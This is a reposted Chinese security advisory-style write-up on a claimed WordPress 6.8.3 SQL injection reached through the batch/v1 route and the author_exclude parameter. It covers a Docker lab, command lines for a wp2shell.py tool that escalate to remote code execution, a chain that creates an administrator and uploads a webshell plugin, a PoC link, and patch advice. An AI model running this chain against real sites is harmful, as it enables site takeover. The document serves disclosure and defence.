高危预警!WordPress最新SQL注入漏洞可直接接管网站管理员权限

admin 2026-07-20 04:25:30 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: WordPress6.8.3版本存在高危SQL注入漏洞,攻击者可通过batch/v1路由利用author_exclude参数进行时间盲注,最终实现远程代码执行并完全接管网站管理员权限。漏洞利用链涉及oEmbed和changeset等机制。建议立即升级WordPress或应用修补意见,包括对相关路由实施参数白名单、使用参数化接口修复SQL注入点、隔离关键副作用并加强认证与提权控制。 综合评分: 87 文章分类: 漏洞分析,WEB安全,漏洞预警,解决方案


cover_image

高危预警!WordPress最新SQL注入漏洞可直接接管网站管理员权限

原创

zz zz

星络安全实验室

2026年7月19日 15:40 重庆

在小说阅读器读本章

去阅读

| | | — | | 免责声明:文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,未授权的攻击属于非法行为!文章中敏感信息均已做多层打码处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责作者不为此承担任何责任,一旦造成后果请自行负责 |

1. 环境

  • 主机:Linux

  • Docker:28.2.2

  • Docker Compose:v2.40.2

  • 靶场端口:http://127.0.0.1:8080

  • WordPress:6.8.3-php8.2-apache

  • 数据库:mariadb:11.4

2. 靶场搭建

启动命令

docker compose -f poc/lab/docker-compose.yml up -ddocker compose -f poc/lab/docker-compose.yml run --rm wpcli wp core install \  --url=http://127.0.0.1:8080 \  --title=wp2shell-lab \  --admin_user=admin \  --admin_password='Summer2026!' \  [email protected] \  --skip-emaildocker compose -f poc/lab/docker-compose.yml run --rm wpcli wp post create \  --post_title='Hello lab' \  --post_content='wp2shell local lab' \  --post_status=publish

#

3. 漏洞复现过程

3.1 暴露面确认

python3 wp2shell.py --scan http://127.0.0.1:8080

结果:识别到目标版本并确认 batch/v1 路由可达。

3.2 时间盲注确认

python3 wp2shell.py --check http://127.0.0.1:8080 --delay 0.5 --timeout 10

结果:快慢请求存在稳定时间差,确认盲注可用。

3.3 数据读取

python3 wp2shell.py --read http://127.0.0.1:8080 --expr @@version --max-len 32 --delay 0.2 --timeout 10

结果:读取到数据库版本 11.4.12-MariaDB-ubu2404

3.4 完整 RCE 链路

python3 wp2shell.py --rce http://127.0.0.1:8080 --cmd id -y --timeout 30

结果:脚本一次命令完成全链路,最终执行 id 得到 www-data

4. 漏洞链路说明

漏洞链按以下顺序执行:

  1. 探测 batch/v1 路由和盲注可用性。

  2. 通过 author_exclude 注入点进入 SQL 逻辑。

  3. 读取表前缀、管理员 ID、oEmbed cache 记录 ID。

  4. 构造 customize_changeset 和 request 相关伪造行。

  5. 利用 oEmbed -> changeset -> re-entry(parse_request) 创建管理员。

  6. 登录后上传 webshell 插件并执行命令。

poc:https://github.com/ZephrFish/wp2shell-scanner.git

5. 修补意见

5.1 路由与参数白名单

  • 对 /batch/v1 相关请求增加严格参数校验。

  • 拒绝嵌套 batch、畸形 path、以及 author_exclude 这类不应透传到查询层的输入。

5.2 SQL 注入点修复

  • 所有参与 WP_Queryprepare() 或 REST 转发的参数必须使用参数化接口。

  • 避免把用户输入拼接到 NOT ININORDER BYLIMIT 等敏感片段。

5.3 关键副作用隔离

  • oEmbed

    changesetrequest 等机制不应在未授权上下文下触发写库。

  • 对 REST batch 的执行路径增加上下文检查,防止路由混淆导致权限边界失效。

5.4 认证与提权控制

  • 管理员创建、插件上传、REST 写操作都应要求明确权限校验。

  • 对高危操作增加审计日志,便于后续追踪异常请求链。


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:星络安全实验室 zz zz《高危预警!WordPress最新SQL注入漏洞可直接接管网站管理员权限》

评论:0   参与:  0